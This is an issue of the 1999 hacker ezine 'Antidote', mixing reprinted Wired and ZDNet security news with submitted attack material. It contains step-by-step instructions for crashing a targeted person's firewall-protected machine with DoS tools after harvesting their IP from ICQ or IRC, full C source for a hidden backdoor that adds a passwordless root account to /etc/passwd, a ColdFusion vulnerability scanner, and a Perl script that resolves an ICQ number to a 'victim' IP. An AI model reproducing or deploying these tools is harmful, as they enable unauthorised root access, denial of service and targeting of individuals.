Antidote Volume 2 Issue 2 (5/ /99) ** ** ***** * * ** * * *** ** *** ** ** *** ** * ** ** * ** ******** ** **** ******** * ** *** **** ******** *** *** ** * *** * ******** *** * ** **** **** * ** *** ********* * **** ** * *** * ** ** **** ** ** ** **** ** ** ** * *** * ** ** ** ** ** ** ** ** ** ** ** *** ********* ** ** ** ** ** ** ** ** ** ******** * ** ** ** ** ** ** ** ** ** ** ******* * ** ** ** ** ** ** ** ** ** ** ** ***** ** ** ** ** ** ** ** ****** ** **** * * **** ** * *** *** ** *** * ***** **** ** ******* * ** ** *** *** *** *** ***** * ** ------------------------------ Well here is another ezine put out by Antidote. This is our 5th issue that has come out. We have over 380 subscribers so far and we hope to get more. Please keep in mind that this is an educational ezine in wich we are not responsible for any information on here that you might use in the wrong and improper way. Also, please keep in mind that just because we 'print' this information, that it doesn't mean that we made the thing or the exploit up. Most everything in this magazine is made by someone else and is recieved second hand (sent to us), in wich is printed/posted on here by us. --=\\Contents\\=-- 0.00 - Beginng 0.01 - What? 0.02 - FAQ 0.03 - Shouts 0.04 - Writing 1.00 - News & Exploits 1.01 - Erasing Trails 1.02 - Domain Name Glitch 1.03 - Java Glitch 1.04 - Security Hole in Firewalls 1.05 - backdoor.c 1.06 - Cold Fusion Scanner 1.07 - UIN2IP 2.00 - Misc. 2.01 - Hacking Group Report 2.02 - AntiOnline 2.03 - Cold Fusion ---------------------------- --=\\0.00\\=-- 0.01 --=\\What?\\=-- What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, cause that would be wrong. We don't claim to be a hacking magazine. All Antidote is, is basically current news and happenings in the underground world. We aren't going to teach you how to hack or anything, but we will supply you with the current information and exploits. Mainly Antidote is just a magazine for people to read if they have some extra time on there hands and are bored with nothing to do. If you want to read a magazine that teaches you how to hack etc, then you might want to go to your local bookstore and see if they carry '2600'. ---------------------------- 0.02 --=\\FAQ\\=-- Here are a lot of questions that we seem to recieve a lot, or our "Frequently Asked Questions". Please read this before e-mailing us with questions and if the question isn't on here or doesn't make sense, then you can e-mail us with your question. > What exactly is "Antidote"? See section 0.01 for a complete description. > I find Antidote to not be shot for the beginner or does not teach you the basics, why is that? Antidote is for everyone, all we are basically is a news ezine that comes out once a month with the current news, exploits, flaws and even programming. All of the articles that are in here are recieved second hand (sent to us) and we very rarely edit anyone's articles. > I just found Antidote issues on your webpage, is there anyway I can get them sent to me through e-mail? Yes, if you go to www.thepoison.org/antidote there should be a text box where you can input your e-mail address. You will recieve Antidote the second we release it and it will be sent as an attachments > If I want to submit something, are there any 'rules'? Please see section 0.03 for a complete description. > If I submitted something, can I remain anonymous? Yes. Just make sure that you specify what information about yourself you would like to be published above your article (when sending it to us) and we will do what you say. > I submitted something and I didn't see it in the current/last issue, why is that? It could be that someone else wrote something similar to what you wrote and they sent it to us first. If you sent us something and we didn't e-mail you back, then you might want to send it again because we probably didn't get it (we respond to all e-mails no matter what). We might use your article in future issues of Antidote. > Can I submit something that I didn't "discover" or "write"? Yes you can, we take information that is written by anyone regardless if you wrote it or not. Well thats it for our FAQ. If you have a question that is not on here or the question is on here and you had trouble understanding it, then please feel free to e-mail lordoak@thepoison.org and he will answer your question. This FAQ will probably be updated every month. ---------------------------- 0.03 --=\\Shouts\\=-- These are just some shout outs that we feel we owe to some people. Some are individuals and Some are groups in general. If you are not on this list and you feel that For some reason you should be, then please contact Lord Oak and he will post you on here and We are sorry for the Misunderstanding. Well, here are the shout outs: Duece ox1dation Lord Oak Forlorn Altomo 0dnek PBBSER HNN [www.hackernews.com] Thepoison.org Retribution 403-security.org EazyMoney Like we said above, if we forgot you and/or you think you should be added, please e-mail lordoak@thepoison.org and he will be sure to add you. ---------------------------- 0.04 --=\\Writing\\=-- As many of you know, we are always open to articles/submittings. We will take almost anything that has to do with computer security. This leaves you open for: -Protecting the system (security/securing) -Attacking the system (hacking, exploits, flaws, etc....) -UNIX (really anything to do with it...) -News that has to do with any of the above.... The only thing that we really don't take is webpage hacks, like e-mailing us and saying "www.xxx.com" was hacked... But if you have an opinion about the hacks that is fine. If you have any questions about what is "acceptable" and not, please feel free to e-mail Lord Oak [lordoak@thepoison.org] with your question and he will answer it. Also, please note that if we recieve two e-mails with the same topic/idea then we will use the one that we recieved first. So it might be a good idea to e-mail one of us and ask us if someone has written about/on this topic so that way you don't waste your time on writing something that won't be published. An example of this would be: If Joe sends me an e-mail with the topic being on hacking hotmail accounts on thursday. And then Bill sends us an e-mail on hacking hotmail accounts on sunday, we will take Joe's article because he sent it in first. But keep in mind, we might use your article for the next issue! If you have something that you would like to submit to Antidote, please e-mail lordoak@thepoison.org or duece@thepoison.org and we will review the article and put it in Antidote (if we like it). ---------------------------- --=\\1.00\\=-- 1.01 --=\\Erasing Trails\\=-- [www.wired.com] Email leaves a trail. Zero-Knowledge Systems is out to cover it up. The Canadian privacy technology start-up said Monday that it had signed up 50 Internet service providers and networks to its Freedom Network, a software-service combination meant to bring more anonymity to Net users. "This represents the first time that ISPs have taken concrete steps to address users' privacy concerns," said Austin Hill, president of Zero-Knowledge Systems in a statement. The company announced the news at this week's ISPCon in Baltimore. Mail servers at participating ISPs and networks use the service to encrypt an email message's data and route it via an untraceable path, Zero-Knowledge said. Zero-Knowledge says the technique protects users from uninvited scrutiny of their online activities. The 50 participating providers and networks -- which don't include any high-profile US ISPs -- are located in the United States, Great Britain, the Netherlands, Japan, Canada, Austria, and Australia. Also announced at ISPCon on Monday was a plan by Inktomi and Sandpiper Networks to merge two technologies that take different approaches to speeding the delivery of Web pages to end users. Sandpiper Networks said it plans to integrate its Adaptive Content Distribution technology with Inktomi's Traffic Server network caching technology. Inktomi's Web-caching technology creates local copies of an ISP's most frequently requested pages for its users. The reactive process stores Web content according to the frequency of customers' requests. Sandpiper's Footprint service is driven more by the decisions of content providers. Heavily visited Web sites sign up for Footprint to expressly get their content on the geographically dispersed Sandpiper Footprint network. Both systems work on the principle of reducing the network distance between users and Web-page content. The companies said Inktomi's Traffic Server will provide cache platform to help power Sandpiper's content servers for the Footprint network. As part of the agreement, Inktomi has also agreed to invest in Sandpiper's $21.5-million, second-round financing. Other investors include America Online, Eagle New Media Investment LLC, an investment affiliate of the Times-Mirror Company, and Hambrecht & Quist. http://www.wired.com/news/news/technology/story/19327.html ---------------------------- 1.02 --=\\Domain Name Glitch\\=-- [www.wired.com] As the "test period" for new domain name registrars officially began, Network Solutions continued to suffer from technical glitches. Work was completed on the Internic Registration Services database over the weekend. On Monday, however, a problem at Network Solutions prevented some of its customers from making changes to their domain names. Network Solutions spokesperson Brian O'Shaughnessy tried to downplay the inconvenience. "It runs the gamut from negligible to probably a fair level of nuisance to registrants who are trying to do some changes to their site." The Internic database generally lists technical, administrative, and billing contacts, called "handles," for domain name owners. A user must use his or her handle to make changes to a site. For example, if a domain administrator wanted to add to the domain a server with a new IP address, he would have to use his handle -- often an email address -- to notify Network Solutions of the change. Some domain name handles started disappearing over the weekend, and Network Solutions has yet to determine how many domain name holders have been affected. "Some files just list the administrative and technical contacts and won't list the billing contact," O'Shaughnessy said. Some customers have complained that none of the contact listings appear for some domains, which was confirmed by searching the Network Solutions database. O'Shaughnessy insisted that the content of the database was still intact internally at Network Solutions. But some customers were outraged at another in a long string of failures by Network Solutions. "The handle is the most important thing in the [registration] database," said Danish Internet lawyer and author Dennis Willardt Zewillis. "It is a point of contact -- so that only administrative or technical contact can change domain names around from server to server." Zewillis' domain, domainnamelaw.com, was missing its contact information when he looked it up on Friday night, and it was still missing on Monday. "I think [Network Solutions was] trying to hide how easy it is to really mess up the whole domain name system," Zewillis said. "And that's worrying me a lot. It's happening every month." In January, Zewillis alerted Network Solutions to a far more serious problem: Instead of disappearing, domain name contacts were temporarily reassigned at random to people who were not associated with those domains. "They were changed so that other people's email addresses were listed as the email contact," he said. "This gave the person listed as the contact the ability to make changes to a domain." [A man in Canada who was assigned control over a spate of domains] could have totally messed around with 100,000 domains." Zewillis said that, at the very least, Network Solutions should have notified customers about this problem. Other users reported the same problem on Internet mailing lists on Monday. Some were equally dissatisfied with Network Solutions' response that their contact information would reappear at some point in the near future. Derrick Bennett, who runs a domain name management company, agreed that it was the latest in a series of problems. "The only technical effect this has is in the time I have wasted calling NetSol's non-800 number [to find out what was wrong] and the time I will spend next week checking all of my domains again," said Bennett. Two months ago, Bennett said a domain that his company managed was mistakenly redirected to another Web site. "They had done a global DNS change for another customer and accidentally changed my customer's record to point at another DNS server." It took two days to fix and cost his customer time and lost revenue "for something they have no control over and no recourse for," Bennett said. Network Solutions attributes the problems to the growth of the Internet. "You're dealing with an industry that is essentially the fastest-growing segment of the Internet," O'Shaughnessy said. "More people are getting on the Net and they have to go through Network Solutions." http://www.wired.com/news/news/technology/story/19342.html ---------------------------- 1.03 --=\\Java Glitch\\=-- There is a new bug that causes the Windows 95 and 98 operating system to crash. Joseph Ashwood (the 'foudner') said that it keeps creating multiple computing processes called "threads". What it does it is keeps creating these threads until the system runs out of memory (or RAM) forcing you to reboot your computer. Microsoft and Sun identified or called this program a "denial of service attack" (or a DOS). Considering that it overloads the system and slows it down. For more information, visit Joseph Ashwood's homepage wich is located at: http://www-scf.usc.edu/~ashwood ---------------------------- 1.04 --=\\Security Hole in Firewalls\\=-- SECURITY HOLES IN CONSEAL PC FIREWALLS Anther seucrty hole in the Conseal PC Firewall a.k.a. signal9 Just think of all the wanna be "hackers" that are going to crash cuz of this dos/oob atack. I think it is funny as hell. This trick works best with ICQ and IRC I write this for educational use only!! If you get kicked off your isp cuz you did not do it right it is your own damn falt not mine. Here we go, First off get the victims ip# off ICQ or on IRC they could be spoofed type this to get a the real ip# on IRC /dns .Which gives:=+user@194.134.10.162. This is his true ip #4. Now once again you /dns 194.134.10.162. This time, there is a response Resolved to If he/she has you on there ignore list on ICQ then make another account and readd that uin# or Try to find some one there talking to that is on the victims list and is on your list too either way you'll get their ip#. What you got to do now is open a exploit (nestea or boink, newtear etc for Linux) (the best to use is Exploit Generator v0.85 for Windows) run a netstat "dns their ip#" get the port open from that host. You should now have the victims ip# and port , then send a packet just 1 from a regognized host they talk to seldomly "note" 79% firewall users have such fucked up rulsets or so many incoming hosts that they let 1 packet through. that packet is let through on their ruleset, so it registers =) ding! It may take a while for the packet to send the whole fragment but within a matter of seconds. Boom watch the dumb fuck go offline. There are other ways of forcing backdoors open on conseal PC firewall "considering it has 2 flaws" As to be said by many firewall annaylists "conseal pc firewall" is the most secure firewall to prevent attacks against hackers. Well you annalzers check twice next time :) This has been tested aginst win nt 4.0 win 95/98 I would like to say about 99% considering you have some firewall warrior out amongst us. This is good to prove to pepole that think there really secure that thay ain't got shit basicly. Even lamers can prove them worng. EazyMoney eazy_money@Cyber-Strike.com ---------------------------- 1.05 --=\\backdoor.c\\=-- /* A rip off a sockets tutorial i found somewhere cause I didn't feel like writing stupid basic sockets code when I had it in my src directory already. */ /* Greets: Undernet Channels: #rootworm, #hacktech, #hyperlink, #3xposure, #legionoot Groups: The LegionOOT (www.legionoot.cc), Team Sploit People: Cyph3r, n3m0, Adoni, f0bic, d0g, khe0ps, h-S-t, F-o-X, NeonMatrix, Azmodan, & Venomous /* Usage (setup): # gcc -o backdoor backdoor.c # ./backdoor password & Usage (using): telnet to host (port 505) --> type the password (don't wait for a prompt, there isn't one so its less obvious its a backdoor) --> type 1or 2. And yes it's _supposed_ to disconnect you after each command. */ #include #include #include #include #include #include #include #include #define PORT 505 #define MAXDATASIZE 100 #define BACKLOG 10 void handle(char *command); int main(int argc, char *argv[]) { int sockfd, new_fd, sin_size, numbytes; char *bytes; struct sockaddr_in my_addr; struct sockaddr_in their_addr; char buf[MAXDATASIZE]; char ask[]="Enter Command (1 to put r00t::0:0:... in /etc/passwd, 2 to send '7h1s b0x 1s 0wn3d' to all people on the box: "; if (argc != 2) { fprintf(stderr,"Usage: %s password\n", argv[0]); exit(1); } if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket"); exit(1); } my_addr.sin_family = AF_INET; my_addr.sin_port = htons(PORT); my_addr.sin_addr.s_addr = INADDR_ANY; if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) { perror("bind"); exit(1); } if (listen(sockfd, BACKLOG) == -1) { perror("listen"); exit(1); } while(1) { /* main accept() loop */ sin_size = sizeof(struct sockaddr_in); if ((new_fd = accept(sockfd, (struct sockaddr *)&their_addr, \ &sin_size)) == { perror("accept"); continue; } inet_ntoa(their_addr.sin_addr); if (!fork()) { recv(new_fd, buf, MAXDATASIZE, 0); bytes = strstr(buf, argv[1]); if (bytes != NULL){ send(new_fd, ask, sizeof(ask), 0); numbytes=recv(new_fd, buf, MAXDATASIZE, 0); buf[numbytes] = '\0'; handle(buf); } close(new_fd); exit(0); } close(new_fd); while(waitpid(-1,NULL,WNOHANG) > 0); /* clean up child processes */ } } void handle(char *command) { FILE *fle; if(strstr(command, "1") != NULL) { fle = fopen("/etc/passwd", "a+"); fprintf(fle, "r00t::0:0:r00t:/root:/bin/bash"); fclose(fle); } if(strstr(command, "2") != NULL) { system("wall 7h1s b0x 1s 0wn3d"); } } PBBSER pbbser@legionoot.hypermart.net ---------------------------- 1.06 --=\\Cold Fusion Scanner\\=-- /* COLD FUSION VULNERABILITY TESTER - Checks for the l0pht advisory "Cold Fusion Application Server Advisory" dated 4.20.1999 you can find a copy of this advisory and all other l0pht Security Advisories here: http://www.l0pht.com/advisories.html much of this program was blatently copied from the cgi scanner released about a week ago, written by su1d sh3ll... I just want to give credit where credit is due... this particular scanner was "written" (basically modified) by hypoclear of lUSt - Linux Users Strike Today... I know that it is trivial to check to see if a server is vulnerable, but I had fun doing this so who the heck cares if I want to waste my time... while I'm here I minds well give shout outs to: Phrozen Phreak (fidonet rules) Special K (you will never get rid of my start button ;-) go powerpuff girls (he he) ;-) compile: gcc -o coldscan coldscan.c usage: coldscan host tested on: IRIX Release 5.3 (this should compile on most *NIX systems though) */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include void main(int argc, char *argv[]) { int sock,debugm=0; struct in_addr addr; struct sockaddr_in sin; struct hostent *he; unsigned long start; unsigned long end; unsigned long counter; char foundmsg[] = "200"; char *cgistr; char buffer[1024]; int count=0; int numin; char cfbuff[1024]; char *cfpage[5]; char *cfname[5]; cfpage[1] = "GET /cfdocs/expeval/openfile.cfm HTTP/1.0\n\n"; cfpage[2] = "GET /cfdocs/expeval/displayopenedfile.cfm HTTP/1.0\n\n"; cfpage[3] = "GET /cfdocs/expeval/exprcalc.cfm HTTP/1.0\n\n"; cfname[1] = "openfile.cfm "; cfname[2] = "displayopenedfile.cfm "; cfname[3] = "exprcalc.cfm "; if (argc<2) { printf("\n-=COLD FUSION VULNERABILITY TESTER=-"); printf("\nusage - %s host \n",argv[0]); exit(0); } if ((he=gethostbyname(argv[1])) == NULL) { herror("gethostbyname"); exit(0); } printf("\n-=COLD FUSION VULNERABILITY TESTER=-\n"); printf("scanning...\n\n"); start=inet_addr(argv[1]); counter=ntohl(start); sock=socket(AF_INET, SOCK_STREAM, 0); bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(80); if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0) { perror("connect"); } while(count++ < 3) { sock=socket(AF_INET, SOCK_STREAM, 0); bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(80); if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0) { perror("connect"); } printf("Searching for %s : ",cfname[count]); for(numin=0;numin < 1024;numin++) { cfbuff[numin] = '\0'; } send(sock, cfpage[count],strlen(cfpage[count]),0); recv(sock, cfbuff, sizeof(cfbuff),0); cgistr = strstr(cfbuff,foundmsg); if( cgistr != NULL) printf("Exists!\n"); else printf("Not Found\n"); close(sock); } } ---------------------------- 1.06 --=\\UIN2IP\\=-- #!/usr/bin/perl # # coded, (i.e. slapped together in a lazy-ass way) by Dr. Labrat # # Disclamer: If you use this to F*ck someone up, you are a bad, bad person. It wasn't me. # You are on your own. # # Simple- give it a UIN and it will try to give you the IP address of the #victim. # # Only works if the user is online and is using the ICQ webserver, but then # that is probably what you need anyhow :-) # see www.labrat.cx for icqget.pl for getting files from the victim... # Thought for the day: Using this makes you a script-kiddie. # # Thx to Packet St0rm $uin=$ARGV[0]; $iaddr= gethostbyname("members.icq.com"); if ($uin) { $url = "/$uin"; } else { die "No uin - Duh.\n"; } use IO::Socket; use IO::Handle; $port = 80; $proto = getprotobyname("tcp"); $paddr = sockaddr_in($port, $iaddr); print "ICQ UIN to IP rsolver, by Dr. Labrat\n"; socket(DATA, PF_INET, SOCK_STREAM, $proto) or die "socket: $!"; connect(DATA, $paddr) or die "Connect error: $!"; autoflush DATA 1; print "Connected to members.icq.com...\n"; print "Trying to resolve UIN: $uin\n"; print DATA "GET $url HTTP/1.0\r\n\r\n\r\n"; @data=; if ( $data[0]=~/OK/){ foreach $chunk (@data) { if ( $chunk=~/myhome.gif/) { print "Found UIN\n"; $sneak=$chunk; last; } } } if ($sneak) { print "Snarfed the IP address!\n"; } else { die "User not online or not running ICW webserver, maybe doesn't even exist!\n"; } @ip=split(/\"/,$sneak); $realip=substr($ip[1], 7,15); print "\n$realip\n\n"; print "Done....\n"; close DATA; ---------------------------- --=\\2.00\\=-- 2.01 --=\\Hacking Group Report\\=-- With more and more people connecting to the Internet these days, there's bound to be more new hackers and hacking groups. In this issue of Antidote we will be looking at a group that goes by the name of "The Hong Kong Danger Duo". They claim not to be elite, and they call themselves 'script kiddies', but "The Hong Kong Danger Duo" ( HKDD ) seems to be far from that. They strike here and there, but when they do, their creative and funny web pages are a site to behold. The members of HKDD which are Kung-P00, SpecialK, B0y wund3r, Jamaican J1m, Butt3ry L0bster M4n, and Phel0n bring a sense of humor to the otherwise dull and un-inventive web page hacks in resent history. The HKDD are truly innovative and intelligent because they bring back the humor in web page hacking. Unlike most hacks that only have " w3 0wn j00.. fj34|2 0u|2 3|2337 |20071n' 4b1l17135 f00" or something gay like that, the HKDD have creative and colorfull pages that poke fun at the admin, whoever they are flaming at that time, and show off their elite HTML skills. Hopefully in the near future, Antidote would like to have an interview with the HKDD. If you ever get the chance to see a HKDD hack, it's worth it. 0dnek ---------------------------- 2.02 --=\\Antionline.com\\=-- Yep. Antionline.com. It's gayer than ever. With it's new site Anticode.com, and the promotion of Caroline Meinel's "Hacker Wargames", John Varenimastupidbitch, also known as JP, seems to be getting newer and gayer ideas to help Antionline.com become somewhat popular, which will never happen. Anticode.com is played off to be a "Site for security consultants", which basically means that's it a cheap Rootshell.com rip-off. It offers exploits, sniffers, and virus code on it's web site to promote computer security. Even though the exploits are organized by OS and have descriptions by them, which is the only good thing about the entire site, It still remains gay and doesn't need to be visited. Along with the gayness of Anticode.com, is the promotion of Caroline Meinel's "Hacker Wargames". The games seem to be posted and ran to help teach people about computer security without breaking the law. "This isn't to train computer criminals" says one site associated with the "Hacker Wargames". But, what else do they expect by offering completely vunerable servers to the public without fear of getting busted? Doesn't make much sense huh? The "Wargames" has a couple boxes open and a Cisco Router to hack into, also. Along with these boxes, are hints to l/p's for each box and for the Cisco Router, so someone looking to learn a little bit more about computer security can log into the box of their choice and attempt to root the server. The award for wasting your time is your own personal web page on the server you rooted. But remember, their not trying to train computer criminals. 0dnek ---------------------------- 2.03 --=\\Cold Fusion\\=-- As many of you saw last issue, we had the new cold fusion vulnerability. This has caused a lot of problems for many servers and virtualy hosted domains. Many sites have been vandalized because of this bug and it has happened repeatedly to each server / domain. An example of this would be: www.towngreen.com, they have been hacked 8 times, in wich 4 of them were because of the cold fusion vulnerability. Many sites / servers are finally picking up on this and fixing it. Since all of the servers are fixing this problem, the press is picking up on it also, here is an article that I found on ZDNet: Article from: http://www.zdnet.com/zdnn/stories/news/0,4586,1014542,00.html Hackers whack ColdFusion users By Jim Kerstetter and Antone Gonsalves, PC Week April 29, 1999 3:09 PM PT New research on a five-month-old security vulnerability has put hackers on the prowl and a software company on the hot seat. Last week, L0pht, a site that devotes itself to discussions on computer security, posted a warning about a vulnerability in the remote administration features of Allaire Corp.'s ColdFusion Application Server The vulnerability enables a hacker to gain access to all the data stored on that Web server and, in the process, install software to create a back door into the rest of the network. Since that warning was posted last week -- along with a patch from Allaire (Nasdaq:ALLR) -- security experts estimate that more than 100 sites have been hit. Example app is to blame Adam Berrey, product marketing director for ColdFusion, said the security breach resulted from an example application that shipped with the server's documentation. Once the application was deployed, a hacker could use it as a doorway to files on the server. "In February, when we first discovered this issue, we sent out an e-mail to all of our registered customers, and we also proactively contacted all of our key accounts," Berrey said. "We may not have the name of every single customer in our database but I think we've done a very aggressive job." But customers are questioning whether Allaire did do enough to warn them. One of the companies that was missed was NetGrocer Inc., of New York. Ari Sabah, vice president of technology, said one of his developers learned of the problem from an e-mail sent by a friend who also worked with ColdFusion. The security flaw and the availability of a patch on Allaire's Web site had been discussed on the site's discussion group. "Officially, we didn't get anything from [Allaire]," said an annoyed Sabah. "They were too busy going public. They forgot their customers and they forgot who got them there." Berrey said a patch for the problem was posted on Allaire's Web site during the first week of February and a maintenance release of the server, ColdFusion 4.01, will be available Friday for free download from the company's site. Hard hit Still, the ColdFusion hack is not necessarily new. In December, Phrack Magazine first publicized the vulnerability. But it wasn't until the past several weeks that it gained the attention of hackers, who have made it clear that many ColdFusion users haven't installed the patch. One site, a West Coast ISP that hosts at least 30 domains, was particularly hard hit. A hacker, going by the name of MostHateD of GlobalHell, was able to penetrate the company's Web server and gain access to at least three hard drives. In the process, the hacker claimed to have gained access to banking records, mail server passwords, illegally copied software, and even a "nuke" utility -- an illegal piece of software that can be used to launch a denial of service attack against another server. The vulnerability ties into remote administration tools with ColdFusion that are exposed by the sample application. Allaire has its own server-side scripts, similar to CGI, that can be manipulated by an attacker. Once inside, the attacker can upload and download files and replace binary files, said Chris Rouland, director of Internet Security Systems Inc.'s X-Force consulting group. Rouland analyzed the attack after being alerted to it by PC Week. "If you can replace a binary on a computer system, you can back door it and force it to do whatever you want to do," he said. Allaire, of Cambridge, Mass., completed its initial public offering of 2.5 million shares in January. If you don't know what the Cold Fusion Vulnerability is, then please see Antidote Vol2 Issue1 Lord Oak lordoak@thepoison.org ---------------------------- _|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_| _| _| _| _| _| _| _| _| _| _| _| _| _| _|_| _| _|_| _| _| _| _|_|_|_| _| _| _| _| _| _| _| _| _| _| _| _|_| _| _|_| _| _| _| _| _| _| _| _| _| _| Antidote is an HNN Affiliate _| _| http://www.hackernews.com _| _| _| _|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_| All ASCII art in Antidote is done by Lord Oak and permission is needed before using it. Copyright Thepoison.org 1998, all rights reserved.